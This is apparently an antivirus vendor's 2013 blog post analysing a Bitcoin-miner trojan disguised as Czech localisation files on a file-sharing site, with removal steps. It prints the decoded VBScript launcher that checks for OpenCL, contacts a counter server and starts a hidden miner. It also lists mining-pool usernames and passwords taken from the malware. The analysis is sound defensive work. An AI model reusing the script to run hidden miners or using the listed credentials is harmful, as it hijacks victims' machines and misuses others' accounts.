Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

August 1st, 2013

Malicious Bitcoin Miners target Czech Republic

Single BitcoinToday we are going to talk to those of you who use Bitcoin digital currency to pay for a variety of goods and services – along with a warning about yet another source of Bitcoin miners – the sharing services. You may think that if you avoid cracks and keygens while browsing the web you will be safe. Well, we would recommend that you reconsider that position. Recently we found that on the file sharing service someone uploaded a lot of fake files containing Bitcoin miners!

Bitcoin Mining service

First a little background for the uninitiated: Bitcoins can be obtained by trading real currency, goods, or services with people who have them or alternatively, through mining. The mining process involves running software that performs complex math problems for which you’re rewarded a share of the income. There are a finite amount of Bitcoins to be had, and mining for them can be compared to extracting gold or diamonds from the earth. The more you get, the fewer there are to be had, so it becomes increasingly harder and more expensive. Here’s a descriptive article about mining.

Bitcoin mining services such as use shared computer resources of their users to mine new Bitcoins. In order to participate, the mining users have to create an account and then register their computers (workers) with the service. Then they simply run the Bitcoin miner program provided with their credentials on as many computers as they have. In the end, if they had enough computation power and time they might end up with a few Bitcoins.

It can be expected that some people will not be satisfied just using their own machines so they will try to use the computing power of unsuspecting victims. And that’s exactly what the authors of this malware are doing: They use hardware that does not belong them to generate more money.

It’s not a Bitcoin problem; it’s a people problem

We must stress that there’s nothing wrong with Bitcoin or its mining services. The problem is that some greedy people are misusing them.

Some of them can be seen on the following image.  The word “cestina” means that the file should contain Czech localization of the referenced program. All of them contain a hidden feature, and sometimes the name is a complete fabrication. For example, The-Night-of-the-Rabbit-cestina.exe contains a crack for Call of Duty 4. Notice too, that all these files have an elevated popularity; no doubt a result of tampering. Some downloaders already suspect something fishy about these files. malicious filesWarning comment on the sharing server.


Malware analysis

If you run the downloaded installer, new files will be created in “c:\windows\inf\ directory. The first dropped file is ntvdm.inf which contains configuration information for the Bitcoin miner. The second file is named ntvdm.vbe and contains the miner’s start-up script encoded with Microsoft Script Encoder. Furthermore, there is a randomly-named directory created with miners binaries. Attackers use opensource cgminer which is available on GitHub.

Malicious installer

Configuraion for a bitcoin miner

Encoded start-up script

Fortunately it was quite easy to decode the start-up script. With a little modification for better readability we got this result:

set shell=wScriPt.CreateObject("WScript.Shell"):
WscrIpt.echo hoMedIr:
Set objFSO=CreateObject("Scripting.FileSystemObject"):
If objFSO.FIleexists(windowsdIr&"\system32\OpenCL.dll") Then 
 if Not oBjFSO.FilEExIsts(hOmedir&"\regbcm")THEn sEt objXmLhTTP=CreateObject("MSXML2.XMLHTTP"):"GET","",false:
  Set regFile=objFsO.CreaTeTextFile(homedIr&"\regbcm",TRue):
 End if:
 Set ObjwMIServiCe=GEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):
 sEt objstartup=oBjWMIServiCe.Get("Win32_ProcessStartup"):
 SEt objConFig=ObjSTArtup.SpawnInstaNce_:
 Set objProcESs=GetObjEcT("winmgmts:root\cimv2:Win32_Process"):
 Set objFSO=CreateObject("Scripting.FileSystemObject"):
 SeT lisTfile=objFSo.OpeNTexTFilE("c:\windows\inf\ntvdm.inf"):
 path=winDowsdir&"\inf\"&execNAmE&"\"&exeCName&".exe -o "&url&" -u "&login&" -p "&passworD:
End If

Notice the first condition which checks whether the OpenCL library is present on the system. This library is used for massively parallel computing by the miner (remember that mining Bitcoins is a very difficult computational problem and therefore requires parallelism). If the library is not found the miner will not start.

The following condition tests if the directory “%USERPROFILE%\regbcm” exists. If not the script contacts h**p:// creates the conditional file which is probably working as a global mutex. This process seems to function as the infection counter since there is no downloaded data.

As the last step, the configuration information is read from “c:\windows\inf\ntvdm.inf” and miner is started. An interesting feature of this script is that it finally flashes a message box with path to “%USERPROFILE%”.

Startup script request

Removing the malware

If you have AVAST installed on your computer, it will automatically detect the malicious miner as VBS:FlufferMiner-A and delete it.

To manually remove all residues of this application just terminate “C:\Windows\System32\WScript.exe” and any executable running from “C:\Windows\Inf\” or a program having its parent “C:\Windows\Inf\ntvdm.vbe”. Then delete the entire directory mentioned in the first line of configuration file ntvdm.inf. Files “C:\Windows\Inf\ntvdm.vbe” and “C:\Windows\Inf\ntvdm.inf” delete as well.

Samples SHA256

Start-up script VBS:FlufferMiner-A:




Misusing user accounts

user name   worker name	  password
frankfrank  frankus       frankus575
franzpat    pateil        patology
humbo	    humbobo       humbra
icemann	    powerhw1      freaky
kansasan    kansasboy     desertpete
kuller5	    kuller500     kulinaro
mazdafan    mazdahmm      corvette
pakostan    pakostan01	  shalala555
pollack	    smasher10	  smogfog
richierich  richiebitch   makemybuck
simmoun	    fluffer       fartbart
sorrypal    paypal        payme
stuczle	    passike       matlar
trinkrapek  chuck01       pioneer123